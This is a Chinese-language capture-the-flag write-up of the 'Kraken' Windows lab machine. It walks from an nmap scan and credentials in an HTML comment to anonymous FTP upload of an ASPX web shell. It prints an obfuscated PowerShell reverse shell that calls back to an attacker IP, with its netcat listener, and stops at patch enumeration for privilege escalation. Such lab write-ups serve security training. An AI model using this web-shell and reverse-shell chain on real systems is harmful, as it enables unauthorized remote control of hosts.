Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Fatec Ourinhos CTF 2018――Writeup

0
0
介绍

本文是一篇关于 Fatec Ourinhos CTF 2018 第 2 版挑战赛的 write-up ,我将详细的阐述如何拿到 Kraken 这台机器 flag 。

机器的原名是 Kraken ,是我在 2017 年为我的团队 WATCHERS 搭建的个人渗透测试实验室的一部分。

挑战信息

名称: Unleash the Kraken

我们的目标 IP 地址是 192.168.56.100 ,域名是 kraken.wtc 。

操作系统: windows

枚举扫描阶段

Nmap 向我们显示了以下输出内容:

[root:~] nmap 192.168.56.100 -Pn -sT
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT
Nmap scan report for 192.168.56.100
Host is up, received user-set (0.10s latency).
Not shown: 990 filtered ports
Reason: 990 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
443/tcp open https syn-ack
1723/tcp open pptp syn-ack
3389/tcp open ms-wbt-server syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49156/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

很明显,我们有一个网站和一个 FTP 服务器需要渗透测试。其他的服务都需要凭证,但我们没有凭证信息。

这个网站的页面是一张 “ 海妖 (kraken)” 的图片,如下图所示:


Fatec Ourinhos CTF 2018――Writeup

让我们启动一个 cURL 请求 http 的服务端口,看看我们能得到了什么信息:

[root:~] curl http://192.168.56.100
<html>
<body>
<div align="center">
<h1>Release the kraken!</h1>
<img src="kraken-pic.jpg"/>
</div>
<!-- Username: DavyJones -->
<!-- Password: #kr4kud0o0O -->
</body>
</html>

从网页源码中我们拿到了凭证。尝试登陆 FTP (端口 21 )服务并没有成功,尝试登录 RDP (端口 3389 )服务同样失败了!

漏洞分析

现在,我尝试通过匿名账户 (anonymous) 登录 FTP 竟然成功了!

[root:~] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,359,065,088 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-17-2018 01:08PM <DIR> kraken
05-17-2018 02:01PM <DIR> uploads
05-17-2018 01:08PM <DIR> App_Data
05-17-2018 11:26AM 189 index.html
05-17-2018 11:21AM 53404 kraken-pic.jpg
226-Directory has 49,359,065,088 bytes of disk space available.
226 Transfer complete.
ftp>

我们可以通过 FTP 的匿名账户访问到 Web 根目录,让我们尝试上传文件。

[root:/tmp] echo 'andre' >> file.txt
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,354,731,520 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
550 Access is denied.
ftp>

我们没有权限上传文件。但也许另一个文件夹可以? uploads 这个文件夹本身就是接收文件的,应该是有权限的!

ftp> cd uploads
250 CWD command successful.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (175.2805 kB/s)
ftp> exit
221 Goodbye.
[root:/tmp] curl http://192.168.56.100/uploads/file.txt
andre
[root:/tmp]

漏洞利用

现在我们知道了一种上传任意文件的方法,并且我们可以使用浏览器访问上传的文件。那么,现在就只是上传个 Web shell 的问题了,因此我们可以在 Kraken 主机上获得一个 shell 。

[root:/tmp] cp /usr/share/webshells/aspx/cmdasp.aspx .
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,345,097,728 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (42.9749 MB/s)

现在使用 Web 浏览器访问 Webshell 并发送命令!

拿到主机权限

为了获得一个 shell ,我使用了我编写的反向 shell 生成器工具 shellpop 来帮助我拿到主机的系统 shell ,如下所示:

[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443
[+] Execute this code in remote target:
powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};"
[+] This shell DOES NOT have a handler set.
[root:/tmp]# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49244.
PS C:\windows\system32\inetsrv>

现在我们已经拿到了系统 shell 的权限。在此计算机中有多种方法可以拿到 SYSTEM 权限,但这适用于权限提升阶段。

特权提升

如果你在系统信息枚举阶段多花一点时间,你很快就会发现这台机器缺少很多补丁程序。

PS C:\windows\system32\inetsrv> Get-Hotfix | Where-Object { $_.Description -eq "Security Update" }
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
KRAKEN Security Update KB2479943 6/15/2015 ...
KRAKEN Security Update KB2491683 6/15/2015 ..

Viewing all articles
Browse latest Browse all 12749